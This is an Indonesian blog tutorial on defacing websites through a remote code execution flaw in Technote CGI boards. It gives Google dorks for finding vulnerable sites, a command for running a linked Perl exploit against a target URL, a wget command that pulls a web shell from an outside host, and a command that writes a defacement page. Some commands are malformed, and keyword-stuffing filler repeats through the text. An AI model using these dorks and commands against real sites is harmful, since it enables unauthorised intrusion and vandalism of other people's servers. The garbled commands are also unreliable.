HomeNo Category

Deface poc RCE(Remote Execution Code) Technote

Written By Thursday, May 11, 2023 Add Comment

 

Deface poc RCE(Remote Execution Code) Technote


deface RCE (REMOTE CODE EXECUTION)


 information-technology1337.blogspot.com - Tutorial deface technote RCE(Remote Code Execution)0.4, Halo Gaes Balik Lagi Sama Gua maz apip.  pada hari yang cerah ini gua akan share atau berbagi tentang cara deface RCE (REMOTE CODE EXECUTION) yang ada di bugnya technote itu sendiri hehe, disini tools yg di pake menggunakan bahasa perl untuk exploitnya. dan google untuk ngedorkingnya langsung saja tutorialnya

ignore this keyword 

Deface poc RCE(Remote Execution Code) Technote
Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4

Bahan - Bahan:

  • Smartphone atau Pc bisa juga desktop
  • termux atau cmd untuk menjalankan exploitnya
  • dork 
  • Exploit RCE DISINI
ignore this keyword 
Deface poc RCE(Remote Execution Code) Technote
Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4

DORK:
  • Bisa pake Bing dorker buatan mimin atau ngedork manual pake dork bibawah ini
  • inurl:/cgi-bin/technote/
  • inurl:".cgi?board=FREE_BOARD"
  • intext:"TECHNOTE-TOP"

syudah siap semua? nah hal pertama yang kalian harus lakukan yaitu ngedork di google. jika sudah akan seperti ini 

deface RCE (REMOTE CODE EXECUTION)



www.site.com/main.cgi?board=FREE_BOARD 

copy paste dulu exploit rce yang ada di atas ke notepad atau text editor lainya. lalu save menjadi exploit.pl
untuk user termux bisa ketik nano expoit.pl lalu paste,setelah itu CTRL+X lalu Y lalu enter

untuk user windows download perl manual,untuk user termux bisa pake command ini

$pkg install perl

sudah? sekarang buka cmd/termux kalian masing masing.
setelah terminal/cmd terbuka kalian ketikan perintah di bawah ini .
perl exploit.pl http://www.sitetarget.com/blabla/main.cgi?board=FREE_BOARD
 kalau vuln maka akan terlihat seperti gambar dibawah ini.
deface RCE (REMOTE CODE EXECUTION)

lalu bagaimana cara upload Shell nya?
kalian bisa pakai command

wget -O linkshell.com/shell.txt Shell.php

jika tidak dapat upload Shell,kalian bisa memakai commad ini

php "Heked Bay" > p.php


ignore this keyword 
Deface poc RCE(Remote Execution Code) Technote
Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4

sumber:https://mazapip.blogspot.com/2022/01/deface-poc-rceremote-execution-code.html

0 Response to "Deface poc RCE(Remote Execution Code) Technote"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

adesterra